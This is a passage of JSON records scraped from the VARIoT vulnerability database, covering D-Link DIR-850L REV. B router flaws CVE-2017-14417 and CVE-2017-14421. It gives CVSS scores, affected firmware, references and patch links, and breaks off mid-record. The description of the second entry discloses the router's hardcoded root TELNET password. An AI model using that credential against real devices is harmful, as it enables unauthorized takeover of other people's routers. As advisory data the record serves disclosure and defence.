"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
],
"trust": 0.6
}
}
VAR-201709-0588
Vulnerability from variot - Updated: 2023-12-18 13:24register_send.php on D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices does not require authentication, which can result in unintended enrollment in mydlink Cloud Services. D-Link DIR-850L There is an access control vulnerability in the device firmware.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in the register_send.php file in the D-LinkDIR-850LREV.B device using FW208WWb02 and previous firmware. The vulnerability stems from the program not requiring authentication. An attacker could exploit the vulnerability to gain access
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0588",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14417"
}
]
},
"cve": "CVE-2017-14417",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14417",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-31792",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-105137",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14417",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14417",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2017-31792",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-578",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-105137",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "VULHUB",
"id": "VHN-105137"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "register_send.php on D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices does not require authentication, which can result in unintended enrollment in mydlink Cloud Services. D-Link DIR-850L There is an access control vulnerability in the device firmware.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in the register_send.php file in the D-LinkDIR-850LREV.B device using FW208WWb02 and previous firmware. The vulnerability stems from the program not requiring authentication. An attacker could exploit the vulnerability to gain access",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "VULHUB",
"id": "VHN-105137"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14417",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31792",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105137",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "VULHUB",
"id": "VHN-105137"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"id": "VAR-201709-0588",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "VULHUB",
"id": "VHN-105137"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
}
]
},
"last_update_date": "2023-12-18T13:24:19.931000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV. B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100054"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105137"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "NVD",
"id": "CVE-2017-14417"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14417"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14417"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "VULHUB",
"id": "VHN-105137"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"db": "VULHUB",
"id": "VHN-105137"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105137"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"date": "2017-09-13T17:29:00.370000",
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31792"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105137"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008098"
},
{
"date": "2023-11-08T20:57:21.283000",
"db": "NVD",
"id": "CVE-2017-14417"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerability related to access control in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008098"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-578"
}
],
"trust": 0.6
}
}
VAR-201709-0592
Vulnerability from variot - Updated: 2023-12-18 13:19D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices have a hardcoded password of wrgac25_dlink.2013gui_dir850l for the Alphanetworks account upon device reset, which allows remote attackers to obtain root access via a TELNET session. D-Link DIR-850L Device firmware contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in D-LinkDIR-850LREV.B using FW208WWb02 and previous firmware. This vulnerability is due to the hard-coded password used by the Alphanetworks account. A remote attacker can exploit this vulnerability to gain root privileges with a TELNET session
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0592",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14421"
}
]
},
"cve": "CVE-2017-14421",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-14421",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-31788",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-105142",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14421",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14421",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2017-31788",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-574",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-105142",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-14421",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "VULHUB",
"id": "VHN-105142"
},
{
"db": "VULMON",
"id": "CVE-2017-14421"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices have a hardcoded password of wrgac25_dlink.2013gui_dir850l for the Alphanetworks account upon device reset, which allows remote attackers to obtain root access via a TELNET session. D-Link DIR-850L Device firmware contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in D-LinkDIR-850LREV.B using FW208WWb02 and previous firmware. This vulnerability is due to the hard-coded password used by the Alphanetworks account. A remote attacker can exploit this vulnerability to gain root privileges with a TELNET session",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "VULHUB",
"id": "VHN-105142"
},
{
"db": "VULMON",
"id": "CVE-2017-14421"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14421",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31788",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105142",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-14421",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "VULHUB",
"id": "VHN-105142"
},
{
"db": "VULMON",
"id": "CVE-2017-14421"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"id": "VAR-201709-0592",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "VULHUB",
"id": "VHN-105142"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
}
]
},
"last_update_date": "2023-12-18T13:19:21.312000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235001"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105142"
},
{
"db": "JVNDB",
